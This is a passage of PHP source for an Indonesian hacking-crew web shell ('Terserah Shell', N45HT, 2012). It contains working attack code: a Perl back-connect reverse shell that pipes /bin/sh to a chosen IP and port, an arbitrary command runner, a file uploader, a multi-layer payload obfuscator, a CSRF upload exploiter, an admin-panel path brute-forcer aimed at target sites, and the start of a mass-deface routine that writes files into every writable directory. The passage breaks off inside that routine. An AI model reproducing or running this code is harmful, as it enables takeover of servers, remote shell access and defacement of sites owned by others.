  713. <footer style="text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000; position:fixed; left:1px; right:0px; top:0px; border-bottom: 1px solid red ;">
  714. <center><b><font face="Quicksand" color="black" size="3" style="text-shadow: 0 0 5px #2f2b2b, 0 0 10px #2f2b2b, 0 0 20px #2f2b2b, 0 0 45px #2f2b2b, 0 0 40px #2f2b2b;">
  715. <font face="Agency FB" color="red" size="4" style="text-shadow: 0 0 6px black, 0 0 5px black, 0 0 5px black;"></footer>
  716. <?php
  717.     } elseif($_GET['do'] == 'shellscanner') {
  718. ?>
  719. <script language="JavaScript" type="text/JavaScript">
  720. <!--
  721. function MM_openBrWindow(theURL,winName,features) { //v2.0
  722.   window.open(theURL,winName,features)
  723. }
  724. //-->
  725. </script>
  726. <style type="text/css">
  727. <!--
  728. .single{
  729.    border: 1px solid #00ff00;box-shadow: 0px 0px 15px #55FF55;
  730.    padding: 5px;
  731. }
  732. .me  {
  733.    font-size:11px; font-family:Tahoma,Verdana,Arial; color:#ccff99;
  734.    border: 0px;
  735.    padding: 5px;
  736. }
  737.  
  738. .isi{
  739.    padding: 2px;
  740.    border:1px solid #666666;
  741.    font-family: Tahoma;
  742.    color: #ccff99;
  743.    background-color: #666666;
  744.    font-size: 10px;
  745.    font-weight: bold;
  746. }
  747. -->
  748. </style>
  749. <style type="text/css">
  750. #patch {position:absolute; height:1; width:1px; top:0; left:0;}
  751. </style>
  752. </head>
  753. <body>
  754. <center>
  755.  
  756. <center><font color="gold" size="14" face="arial">Backdoor Scanner</font></center><br>
  757. <?php
  758. if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
  759.    if(isset($_POST['yes'])){
  760.       $filename = $_GET['file'];
  761.       echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
  762.       unlink($filename);
  763.       echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
  764.    }else{
  765.       if($_POST['update']) {
  766.          $filename = $_POST['file'];
  767.          if(is_writable($filename)) {
  768.             $handle = fopen($filename, "w+");
  769.             $isi=$_POST['content'];
  770.             fwrite($handle, stripslashes($isi));
  771.             fclose($handle);
  772.             $stat= "<center><strong>edited successfully<br>";
  773.          } else {
  774.             $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
  775.          }
  776.       }
  777.       if($_POST['close']) {
  778.          echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
  779.       }
  780.       $filename = $_GET['file'];
  781.       if (file_exists($filename)){
  782.          $vuln = $_GET['bug'];
  783.          $handle = fopen($filename, "r");
  784.          $contents = fread($handle, filesize($filename));
  785.       ?>
  786.       <center>
  787.       <table>
  788.          <tr><td align="left" class="me"><strong><?=$filename?>��>> Contains :�<?=$vuln?></strong></td></tr>
  789.          <tr><td class="me">
  790.             <form method="post" action="">
  791.             <input type="hidden" name="file" value="<?=$filename?>">
  792.             <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
  793.          </td></tr>
  794.          <tr><td align="center" class="me">
  795.          <?php
  796.          if($_POST['delete']) {
  797.             echo "Are you sure to delete ".$filename." ?";
  798.          ?>
  799.          <tr><td align="center" class="me">
  800.             <input type="submit" name="yes" value=" Y E S ">
  801.             <input type="submit" name="no" value=" N O ">
  802.          </td></tr>
  803.          <?php
  804.          }else{
  805.          echo $stat;
  806.          ?>
  807.          </td></tr>
  808.          <tr><td align="right" class="me">
  809.             <input type="submit" name="close" value=" C l o s e ">
  810.             <input type="submit" name="delete" value=" D e l e t e ">
  811.             <input type="submit" name="update" value=" S a v e ">
  812.          </td></tr>
  813.          <?php
  814.          }
  815.          fclose($handle);
  816.          ?>
  817.       </table>
  818. </form>
  819. <?php
  820. }else{
  821. echo "<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
  822. echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
  823. }
  824. ?>
  825. </center>
  826. <?php
  827. }
  828. }elseif(isset($_POST['Submit'])){
  829.    $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  830.    foreach($ceks as $ceker){
  831.       if($_POST[$ceker]<>""){
  832.          $six.=$_POST[$ceker].".";
  833.       }
  834.    }
  835.    
  836. $cek = explode('.', $six);
  837.  
  838. function ListFiles($dir) {
  839.     if($dh = opendir($dir)) {
  840.  
  841.         $files = Array();
  842.         $inner_files = Array();
  843.  
  844.         while($file = readdir($dh)) {
  845.             if($file != "." && $file != "..") {
  846.                 if(is_dir($dir . "/" . $file)) {
  847.                     $inner_files = ListFiles($dir . "/" . $file);
  848.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  849.                 } else {
  850.                     array_push($files, $dir . "/" . $file);
  851.                 }
  852.             }
  853.         }
  854.  
  855.         closedir($dh);
  856.         return $files;
  857.     }
  858. }
  859.    ?>
  860.    <center>
  861.    <table border="0" width="90%" cellpadding="5">
  862.       <tr>
  863.          <td align="right" width="30"><b>No</b></td>
  864.          <td align="center" width="105"><b> T y p e </b></td>
  865.          <td align="center"><b> F i l e��L o c a t i o n </b></td>
  866.          <td align="center" width="150"><b> L a s t��E d i t </b></td>
  867.          <td  align="right" width="80"><b>F i l e��S i z e</b></td>
  868.       </tr><br>
  869. <?php
  870. $target=$_SERVER['DOCUMENT_ROOT'];
  871.    foreach (ListFiles($target) as $key=>$file){
  872.       $nFile = substr($file, -4, 4);
  873.       if($nFile == ".php"){
  874.          if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
  875.          }else{
  876.             $ops = @file_get_contents($file);
  877.             $op=strtolower($ops);
  878.             $arr = array('c99_buff_prepare' => 'c 9 9',
  879.                       'abcr57' => 'r 5 7');
  880.             $sis=0;
  881.             if($op)
  882.             $size=filesize($file);
  883.  
  884.             $last=date("M-d-Y H:i", $last_modified);
  885.             foreach($arr as $key => $val) {
  886.                if(@preg_match("/$key/", $op)) {
  887.                   $sis=1;
  888.                   $i++;
  889.                   ?>
  890.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  891.                      <td align="right"><font color="red"><blink><?=$i?></blink></font></td>
  892.                      <td align="center"><font color="red"><blink><?=$val?></blink></font></td>
  893.                      <td align="left"><blink>
  894.                      <a href="#" class="abunai" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  895.                      </blink></td>
  896.                      <td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
  897.                      <td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
  898.                      <script language="javascript">
  899.                         var bgcolor = "transparent";
  900.                         var change_color = "#444444"
  901.                         function mover(aa) {
  902.                            aa.style.backgroundColor = change_color;
  903.                         }
  904.                         function mout(aa) {
  905.                            aa.style.backgroundColor = bgcolor;
  906.                         }
  907.                      </script>
  908.                   </tr>
  909.                   <?php
  910.                }
  911.             }
  912.             if($sis<>"1"){
  913.                if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
  914.                   $sis="2";
  915.                   $i++;
  916.                   $val="hidden shell";
  917.                   ?>
  918.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  919.                      <td align="right"><font color="blue"><?=$i?></font></td>
  920.                      <td align="center"><font color="blue"><?=$val?></font></td>
  921.                      <td align="left">
  922.                      <a href="#" class="xxx" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  923.                      </td>
  924.                      <td align="center"><font color="blue"><?=$last?> GMT+9</font></td>
  925.                      <td align="right"><font color="blue"><?=$size?> byte</font></td>
  926.                      <script language="javascript">
  927.                         var bgcolor = "transparent";
  928.                         var change_color = "#444444"
  929.                         function mover(aa) {
  930.                            aa.style.backgroundColor = change_color;
  931.                         }
  932.                         function mout(aa) {
  933.                            aa.style.backgroundColor = bgcolor;
  934.                         }
  935.                      </script>
  936.                   </tr>
  937.                   <?php
  938.                }
  939.             }
  940.             if($sis=="0"){
  941.             foreach($cek as $bugs) {
  942.                 if ($bugs<>""){
  943.                if(@preg_match("/$bugs\((.*?)\)/", $op)) {
  944.                   $i++;
  945.                   ?>
  946.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  947.                      <td align="right"><?=$i?></td>
  948.                      <td align="center"><?=$bugs?></td>
  949.                      <td align="left">
  950.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  951.                      </td>
  952.                      <td align="center"><?=$last?> GMT+9</td>
  953.                      <td align="right"><?=$size?> byte</td>
  954.                      <script language="javascript">
  955.                         var bgcolor = "transparent";
  956.                         var change_color = "#444444"
  957.                         function mover(aa) {
  958.                            aa.style.backgroundColor = change_color;
  959.                         }
  960.                         function mout(aa) {
  961.                            aa.style.backgroundColor = bgcolor;
  962.                         }
  963.                      </script>
  964.                   </tr>
  965.                   <?php
  966.                }              
  967.             }
  968.             }
  969.             }
  970.             if($_POST['textV']<>""){
  971.                $text=$_POST['textV'];
  972.                   if(@preg_match("/$text/", $op)) {
  973.                   $i++;
  974.                   ?>
  975.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  976.                      <td align="right"><?=$i?></td>
  977.                      <td align="center"><?=$text?></td>
  978.                      <td align="left">
  979.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  980.                      </td>
  981.                      <td align="center"><?=$last?> GMT+9</td>
  982.                      <td align="right"><?=$size?> byte</td>
  983.                      <script language="javascript">
  984.                         var bgcolor = "transparent";
  985.                         var change_color = "#444444"
  986.                         function mover(aa) {
  987.                            aa.style.backgroundColor = change_color;
  988.                         }
  989.                         function mout(aa) {
  990.                            aa.style.backgroundColor = bgcolor;
  991.                         }
  992.                      </script>
  993.                   </tr>
  994.                   <?php
  995.                }
  996.            
  997.            
  998.             }
  999.          }
  1000.       }
  1001.    }
  1002.    if($i==0){
  1003.       foreach($cek as $bugs) {
  1004.          if ($bugs<>""){
  1005.             $x++;
  1006.    ?>
  1007.       <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1008.          <td align="right"><?=$x?></td>
  1009.          <td align="center"><?=$bugs?></td>
  1010.          <td align="center"> not exist </td>
  1011.          <td align="center"> no record </td>
  1012.          <td align="right"> -����byte </td>
  1013.       </tr>
  1014.    <?php
  1015.          }
  1016.       }
  1017.    }
  1018.    ?>
  1019.    </table>
  1020.    <?php
  1021. }else{
  1022.    $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  1023. ?>
  1024.    <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
  1025.    <center>
  1026.    <table class="single" width="400" border="1" -webkit-box-shadow: 0px 0px 15px #55FF55; cellpadding="10">
  1027.    <tr><td class="me"><center>
  1028.      
  1029.       <table class="me" width="200">
  1030.          <tr><td class="me">
  1031.             <script language="javascript">
  1032.                function cekKlik(){  
  1033.                   if (!document.fCheck.cekV.checked)
  1034.                      document.fCheck.textV.disabled=true;  
  1035.                   else
  1036.                      document.fCheck.textV.disabled=false;
  1037.                   if(document.fCheck.cekV.checked){
  1038.                      master = master + 1;
  1039.                   }else{
  1040.                      if(master > 0 ){
  1041.                         master = master - 1;
  1042.                      }else{
  1043.                         master = master;
  1044.                      }
  1045.                   }
  1046.                   if(master != 0){
  1047.                      document.fCheck.Submit.disabled=false;
  1048.                   }else{
  1049.                      document.fCheck.Submit.disabled=true;
  1050.                   }        
  1051.                }    
  1052.             </script>  
  1053.             <?php
  1054.             //dari sini
  1055.             foreach($find as $bug) {
  1056.             ?>
  1057.             <script language="javascript">
  1058.                var master = 0;
  1059.                function checkValue<?=$bug?>(){
  1060.                   if(document.fCheck.<?=$bug?>.checked){
  1061.                      master = master + 1;
  1062.                   }else{
  1063.                      if(master > 0 ){
  1064.                         master = master - 1;
  1065.                      }else{
  1066.                         master = master;
  1067.                      }
  1068.                   }
  1069.                   if(master != 0){
  1070.                      document.fCheck.Submit.disabled=false;
  1071.                   }else{
  1072.                      document.fCheck.Submit.disabled=true;
  1073.                   }  
  1074.                }
  1075.             </script>
  1076.             <input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />�<?=$bug?><br>
  1077.             <?php
  1078.             }
  1079.             ?>
  1080.             <input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
  1081.             <input class="isi" disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
  1082.             <br><br>
  1083.             <input type="hidden" name="asal" value="abcd">
  1084.             <input disabled="disabled" type="submit" name="Submit" value=" Start " />
  1085.          </td></tr>
  1086.       </table>
  1087.    </td></tr></table>
  1088.    </form>
  1089. <?php
  1090. }
  1091. ?>
  1092. <br><br><hr width="300">
  1093. <?php
  1094.     } elseif($_GET['do'] == 'bconnet') {
  1095.         echo '<div id="login" style="margin-top: 10px; margin-left: 10px;">';
  1096.         echo '<form action="?page=bcon" method="get"><input type="hidden" name="page" value="bcon"/>';
  1097.         echo 'IP:<br><input type="text" name="ip" value="'.getenv("remote_addr").'" style="margin-top: 5px;"/><br><br>';
  1098.         echo 'Port:<input type="submit" value="Connect" style="margin-left: 130px; margin-top: -4px;"/><br><input type="text" name="port" value="666" style="margin-top: 5px;"/>';
  1099.         echo '</form>';
  1100.         echo '</div>';
  1101.         if(isset($_GET['ip']) && isset($_GET['port'])){
  1102.             $ip = $_GET['ip'];
  1103.             $port = $_GET['port'];
  1104.             $bc = fopen("/tmp/bxcon.pl","w");
  1105.             fwrite($bc,'#!/usr/bin/perl
  1106. use Socket;
  1107. $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
  1108. $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
  1109. $proto=getprotobyname("tcp");
  1110. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  1111. connect(SOCKET, $paddr) || die("Error: $!\n");
  1112. open(STDIN, ">&SOCKET");
  1113. open(STDOUT, ">&SOCKET");
  1114. open(STDERR, ">&SOCKET");
  1115. system("/bin/sh -i");
  1116. close(STDIN);
  1117. close(STDOUT);
  1118. close(STDERR);');
  1119.             fclose($bc);
  1120.             shell_exec("perl /tmp/bxcon.pl");
  1121.             unlink("/tmp/bxcon.pl");
  1122.         }
  1123.     break;
  1124.  
  1125.  
  1126.  
  1127. echo '</td>
  1128. </tr>
  1129. </table>
  1130. <br><center>xB1N4RYx ~ 2012</center><br>
  1131. </body>
  1132. </html>';
  1133. function rooting()
  1134. {
  1135. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
  1136. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1137. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1138. if( $_POST['_upl'] == "Upload" ) {
  1139.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  1140.     else { echo '<b>Basarisiz</b><br><br>'; }
  1141. }
  1142. }
  1143. $x = $_GET["x"];
  1144. Switch($x){
  1145. case "rooting";
  1146.     rooting();
  1147.     break;
  1148.    
  1149.     }
  1150.         }elseif($_GET['do'] == 'infosys') {
  1151.  
  1152. echo '<center><div id="menu" >';
  1153. echo "<ul>";
  1154. echo "System: <font color=blue>".$kernel."</font><br>";
  1155. echo "User: <font color=blue>".$user."</font> (".$uid.") Group: <font color=blue>".$group."</font> (".$gid.")<br>";
  1156. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  1157. echo "HDD: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  1158. echo "Safe Mode: $sm<br>";
  1159. echo "Disable Functions: $show_ds<br>";
  1160. echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")<br>";
  1161. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  1162. echo "<hr>";
  1163.  
  1164.  
  1165.    
  1166. }   elseif($_GET['do'] == 'endeco') {
  1167.  
  1168. @ini_set('output_buffering',0);
  1169. @ini_set('display_errors', 0);
  1170. $text = $_POST['code'];
  1171. ?>
  1172. <form method="post"><br>
  1173. <textarea class='form-control con7' cols=80 rows=10 name="code"></textarea><br><br>
  1174. <select class='form-control con7' size="1" name="ope">
  1175. <center><option value="urlencode">url</option>
  1176. <option value="base64">Base64</option>
  1177. <option value="ur">convert_uu</option>
  1178. <option value="json">json</option>
  1179. <option value="gzinflates">gzinflate - base64</option>
  1180. <option value="str2">str_rot13 - base64</option>
  1181. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  1182. <option value="gzinflater">gzinflate - str_rot13 - base64</option>
  1183. <option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
  1184. <option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
  1185.  
  1186. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  1187. <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option></center>
  1188. </select>&nbsp;<br><br><input class='kntd' type='submit' name='submit' value='Encode'>
  1189. <input class='kntd' type='submit' name='submits' value='Decode'>
  1190. </form>
  1191. <br>
  1192. <?php
  1193. $submit = $_POST['submit'];
  1194. if (isset($submit)){
  1195. $op = $_POST["ope"];
  1196. switch ($op) {case 'base64': $codi=base64_encode($text);
  1197. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1198. break;case 'json' : $codi=json_encode(utf8_encode($text));
  1199. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  1200. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  1201. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  1202. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  1203. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  1204. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  1205. break;case 'urlencode' : $codi=rawurlencode($text);
  1206. break;case 'ur' : $codi=convert_uuencode($text);
  1207. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  1208. break;default:break;}}
  1209.  
  1210. $submit = $_POST['submits'];
  1211. if (isset($submit)){
  1212. $op = $_POST["ope"];
  1213. switch ($op) {case 'base64': $codi=base64_decode($text);
  1214. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1215. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  1216. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  1217. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  1218. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  1219. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  1220. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  1221. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  1222. break;case 'urlencode' : $codi=rawurldecode($text);
  1223. break;case 'ur' : $codi=convert_uudecode($text);
  1224. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  1225. break;default:break;}}
  1226. $html = htmlentities(stripslashes($codi));
  1227. echo "<from><textarea cols=80 rows=10 class='form-control con7' >".$html."</textarea><BR/><BR/></center><br></from>";
  1228.  
  1229.  
  1230.  
  1231. }
  1232.         elseif($_GET['do'] == 'about') {
  1233. ?>
  1234. <br>
  1235.    
  1236.     <div class="terimakasih">
  1237. <tr><td><center><font color="gold">Discovering And Exploiting Security Flaws.
  1238.     <p><font color="Lavender">Thanks To : Rinto AR , ShinChan , PETR03X , Mr.x0x , IndoXploit, And Member N45HT</font>
  1239. <br><a href="https://www.facebook.com/groups/N45HTOfficial/">JOIN TO GROUP OFFICIAL N45HT</a>
  1240.     <br><font color="Lavender"><font></font> <br>Terserah Shell Create By LugiX From N45HT Crew
  1241. </td></tr>
  1242.  
  1243.  
  1244.     <?php
  1245. } elseif($_GET['do'] == 'csrf') {
  1246. ?>      <html>
  1247. <title>CSRF EXPLOITER ONLINE</title>
  1248. <center><br><br><br><br>
  1249. <font color=Lavenda>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  1250. <center>
  1251. <form method="post">
  1252. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1253. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1254. <input type="submit" name="d" value="Lock!">
  1255. </form>
  1256. <?php
  1257. //gak penting
  1258.      @$url = $_POST['url'];
  1259.      @$pf = $_POST['pf'];
  1260.      @$d = $_POST['d'];
  1261. if($d) {
  1262.     //baccod
  1263.    
  1264.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  1265. }
  1266. ?>
  1267. </form>
  1268. </html>
  1269. <?php
  1270.  
  1271. } elseif($_GET['do'] == 'admf') {
  1272.     ?>
  1273. <type='text/javascript'/></script>
  1274. <style>
  1275. </style>
  1276.  
  1277. </head>
  1278. <link rel="SHORTCUT ICON"  href="http://i.imgur.com/2Koa43H.png">
  1279. </style>
  1280. <br>
  1281. <br><center><font color='Lavenda'> NB: Jika Mau Jalankan Tools ini, Belakang Domain Tambahkan " / "  </font></center>
  1282. <br>
  1283. <td width=100% id=Gretz>
  1284. <form action="" method="post">
  1285. <center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="text" size="30" value="http://www.target.co.il/"/>
  1286. <input name="submit_lol" class="textbox" value="Submit Site" type="submit">
  1287. </form>
  1288. <?php
  1289. set_time_limit(0);
  1290.  
  1291. if (isset($_POST["submit_lol"])) {
  1292. $url = $_POST['hash_lol'];
  1293. echo "<br />Crot ".$url."<br /><br />";
  1294.  
  1295. $adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/",  "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel");
  1296.  
  1297. foreach ($adminlocales as $admin){
  1298. $headers = get_headers("$url$admin");
  1299. if (eregi('200', $headers[0])) {
  1300.     echo "<a href='$url/$admin'>$url$admin</a> <font color='gold'>Ketemu Nih !</font><br />";
  1301. }
  1302. else {
  1303.     echo "$url$admin <font color='red'>Tidak Ketemu</font><br />";
  1304. }
  1305. }
  1306. }  
  1307. } elseif($_GET['do'] == 'cmd') {
  1308.     echo "<form method='post'>
  1309.    <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  1310.    <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1311.    </form>";
  1312.     if($_POST['do_cmd']) {
  1313.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  1314.     }
  1315. } elseif($_GET['do'] == 'mass_deface') {
  1316.     function sabun_massal($dir,$namafile,$isi_script) {
  1317.         if(is_writable($dir)) {
  1318.             $dira = scandir($dir);
  1319.             foreach($dira as $dirb) {
  1320.                 $dirc = "$dir/$dirb";
  1321.                 $lokasi = $dirc.'/'.$namafile;
  1322.                 if($dirb === '.') {
  1323.                     file_put_contents($lokasi, $isi_script);
  1324.                 } elseif($dirb === '..') {
  1325.                     file_put_contents($lokasi, $isi_script);
  1326.                 } else {
  1327.                     if(is_dir($dirc)) {
  1328.                         if(is_writable($dirc)) {
  1329.                             echo "[<font color=blue>DONE</font>] $lokasi<br>";
  1330.                             file_put_contents($lokasi, $isi_script);
  1331.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1332.                         }
  1333.                     }
  1334.                 }
  1335.             }
  1336.         }
  1337.     }
  1338.     function sabun_biasa($dir,$namafile,$isi_script) {
  1339.         if(is_writable($dir)) {
  1340.             $dira = scandir($dir);
  1341.             foreach($dira as $dirb) {
  1342.                 $dirc = "$dir/$dirb";
  1343.                 $lokasi = $dirc.'/'.$namafile;
  1344.                 if($dirb === '.') {
  1345.                     file_put_contents($lokasi, $isi_script);
  1346.                 } elseif($dirb === '..') {
  1347.                     file_put_contents($lokasi, $isi_script);
  1348.                 } else {
  1349.                     if(is_dir($dirc)) {
  1350.                         if(is_writable($dirc)) {
  1351.                             echo "[<font color=blue>DONE</font>] $dirb/$namafile<br>";
  1352.                             file_put_contents($lokasi, $isi_script);
  1353.                         }
  1354.                     }
  1355.                 }
  1356.             }
  1357.         }
  1358.     }
  1359.     if($_POST['start']) {
  1360.         if($_POST['tipe_sabun'] == 'mahal') {
  1361.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1362.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1363.             echo "</div>";
  1364.         } elseif($_POST['tipe_sabun'] == 'murah') {
  1365.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1366.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1367.             echo "</div>";
  1368.         }
  1369.     } else {
  1370.     echo "<center>";
  1371.     echo "<form method='post'>
  1372.    <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
